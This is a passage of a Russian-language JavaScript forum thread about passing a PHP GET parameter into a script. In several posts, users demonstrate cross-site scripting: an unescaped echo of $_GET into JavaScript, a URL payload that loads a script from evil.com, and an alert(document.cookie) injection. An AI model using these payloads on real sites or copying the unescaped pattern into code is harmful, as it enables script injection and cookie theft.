Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #11 (permalink)  
Старый 19.07.2013, 15:07
Профессор
Отправить личное сообщение для mta88 Посмотреть профиль Найти все сообщения от mta88
 
Регистрация: 16.05.2013
Сообщений: 229

//http://site.com/?var=1;alert(123);alert(456)
var myVar = <?=$_GET['var']?>

да, да, я что-то такое хотел, но настоящее, чтобы не разрушить зараженный объект и выполнить дополнительный код

получилось вот так
// xss.php
<!doctype html>
<html>
<head>
  <script>
    window.onload = function() {
      var obj = {
        url: 'getdata.php?var=<?php echo $_GET["var"]; ?>'
      }
    }
  </script>
</head>

<body></body>
</html>

а вот вредный url:
xss.php?var=12%27,%20t1:%20%28function%28%29{var%20s=document.createElement%28%27script%27%29;s.type=%22text/javascript%22;s.src=%22http://evil.com/script.js%22;document.body.appendChild%28s%29}%29%28%29,%20t2:%27

или так
xss.php?var=12', t1: (function(){var s=document.createElement('script');s.type="text/javascript";s.src="http://evil.com/script.js";document.body.appendChild(s)})(), t2:'

хотя это уже оффтоп конечно
Ответить с цитированием
  #12 (permalink)  
Старый 19.07.2013, 15:27
Аватар для ruslan_mart
Профессор
Отправить личное сообщение для ruslan_mart Посмотреть профиль Найти все сообщения от ruslan_mart
 
Регистрация: 30.04.2012
Сообщений: 3,018

animhotep, и то.

//http://site.com/?var=1';alert(document.cookie);'

url: 'getdata.php?var=<?=$_GET['var']?>';
Ответить с цитированием
  #13 (permalink)  
Старый 19.07.2013, 16:23
Аватар для animhotep
Профессор
Отправить личное сообщение для animhotep Посмотреть профиль Найти все сообщения от animhotep
 
Регистрация: 17.01.2013
Сообщений: 887

Сообщение от Ruslan_xDD
и то.
url:'getdata.php?var=1';alert(document.cookie);'


mta88, спасибо, понял. это работает
Ответить с цитированием
  #14 (permalink)  
Старый 29.07.2013, 12:37
Интересующийся
Отправить личное сообщение для greencard Посмотреть профиль Найти все сообщения от greencard
 
Регистрация: 04.07.2013
Сообщений: 18

К сожалению методы не работают.

P.s. Данный скрипт находится в html файле, а не в js


Нашел решение, изменил html на php Всем спасибо.

Последний раз редактировалось greencard, 29.07.2013 в 17:49. Причина: решил проблему
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
POST запрос. Перенести переменную из одного скрипта php в другой. SergAG Общие вопросы Javascript 6 18.07.2013 22:39
Как добавить атрибут к ссылке hell100 Общие вопросы Javascript 2 20.06.2012 16:51
Получить переменную от flash odlf3 Общие вопросы Javascript 1 30.11.2011 12:09
Получить содержание другой страницы в переменную Shocker Общие вопросы Javascript 1 08.02.2011 15:51